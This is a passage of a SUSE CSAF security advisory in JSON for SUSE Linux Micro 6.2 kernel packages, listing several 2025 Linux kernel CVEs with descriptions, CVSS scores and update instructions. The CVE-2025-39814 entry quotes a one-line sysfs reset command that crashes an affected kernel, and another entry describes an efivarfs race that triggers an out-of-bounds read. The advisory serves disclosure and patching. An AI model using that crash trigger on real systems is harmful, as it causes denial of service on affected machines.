"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-39813"
},
{
"cve": "CVE-2025-39814",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39814"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: fix NULL pointer dereference in ice_unplug_aux_dev() on reset\n\nIssuing a reset when the driver is loaded without RDMA support, will\nresults in a crash as it attempts to remove RDMA\u0027s non-existent auxbus\ndevice:\necho 1 \u003e /sys/class/net/\u003cif\u003e/device/reset\n\nBUG: kernel NULL pointer dereference, address: 0000000000000008\n...\nRIP: 0010:ice_unplug_aux_dev+0x29/0x70 [ice]\n...\nCall Trace:\n\u003cTASK\u003e\nice_prepare_for_reset+0x77/0x260 [ice]\npci_dev_save_and_disable+0x2c/0x70\npci_reset_function+0x88/0x130\nreset_store+0x5a/0xa0\nkernfs_fop_write_iter+0x15e/0x210\nvfs_write+0x273/0x520\nksys_write+0x6b/0xe0\ndo_syscall_64+0x79/0x3b0\nentry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nice_unplug_aux_dev() checks pf-\u003ecdev_info-\u003eadev for NULL pointer, but\npf-\u003ecdev_info will also be NULL, leading to the deref in the trace above.\n\nIntroduce a flag to be set when the creation of the auxbus device is\nsuccessful, to avoid multiple NULL pointer checks in ice_unplug_aux_dev().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39814",
"url": "https://www.suse.com/security/cve/CVE-2025-39814"
},
{
"category": "external",
"summary": "SUSE Bug 1249895 for CVE-2025-39814",
"url": "https://bugzilla.suse.com/1249895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-39814"
},
{
"cve": "CVE-2025-39817",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39817"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nefivarfs: Fix slab-out-of-bounds in efivarfs_d_compare\n\nObserved on kernel 6.6 (present on master as well):\n\n BUG: KASAN: slab-out-of-bounds in memcmp+0x98/0xd0\n Call trace:\n kasan_check_range+0xe8/0x190\n __asan_loadN+0x1c/0x28\n memcmp+0x98/0xd0\n efivarfs_d_compare+0x68/0xd8\n __d_lookup_rcu_op_compare+0x178/0x218\n __d_lookup_rcu+0x1f8/0x228\n d_alloc_parallel+0x150/0x648\n lookup_open.isra.0+0x5f0/0x8d0\n open_last_lookups+0x264/0x828\n path_openat+0x130/0x3f8\n do_filp_open+0x114/0x248\n do_sys_openat2+0x340/0x3c0\n __arm64_sys_openat+0x120/0x1a0\n\nIf dentry-\u003ed_name.len \u003c EFI_VARIABLE_GUID_LEN , \u0027guid\u0027 can become\nnegative, leadings to oob. The issue can be triggered by parallel\nlookups using invalid filename:\n\n T1\t\t\tT2\n lookup_open\n -\u003elookup\n simple_lookup\n d_add\n // invalid dentry is added to hash list\n\n\t\t\tlookup_open\n\t\t\t d_alloc_parallel\n\t\t\t __d_lookup_rcu\n\t\t\t __d_lookup_rcu_op_compare\n\t\t\t hlist_bl_for_each_entry_rcu\n\t\t\t // invalid dentry can be retrieved\n\t\t\t -\u003ed_compare\n\t\t\t efivarfs_d_compare\n\t\t\t // oob\n\nFix it by checking \u0027guid\u0027 before cmp.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39817",
"url": "https://www.suse.com/security/cve/CVE-2025-39817"
},
{
"category": "external",
"summary": "SUSE Bug 1249998 for CVE-2025-39817",
"url": "https://bugzilla.suse.com/1249998"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-39817"
},
{
"cve": "CVE-2025-39829",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39829"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntrace/fgraph: Fix the warning caused by missing unregister notifier\n\nThis warning was triggered during testing on v6.16:\n\nnotifier callback ftrace_suspend_notifier_call already registered\nWARNING: CPU: 2 PID: 86 at kernel/notifier.c:23 notifier_chain_register+0x44/0xb0\n...\nCall Trace:\n \u003cTASK\u003e\n blocking_notifier_chain_register+0x34/0x60\n register_ftrace_graph+0x330/0x410\n ftrace_profile_write+0x1e9/0x340\n vfs_write+0xf8/0x420\n ? filp_flush+0x8a/0xa0\n ? filp_close+0x1f/0x30\n ? do_dup2+0xaf/0x160\n ksys_write+0x65/0xe0\n do_syscall_64+0xa4/0x260\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nWhen writing to the function_profile_enabled interface, the notifier was\nnot unregistered after start_graph_tracing failed, causing a warning the\nnext time function_profile_enabled was written.\n\nFixed by adding unregister_pm_notifier in the exception path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39829",
"url": "https://www.suse.com/security/cve/CVE-2025-39829"
},
{
"category": "external",
"summary": "SUSE Bug 1250082 for CVE-2025-39829",
"url": "https://bugzilla.suse.com/1250082"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
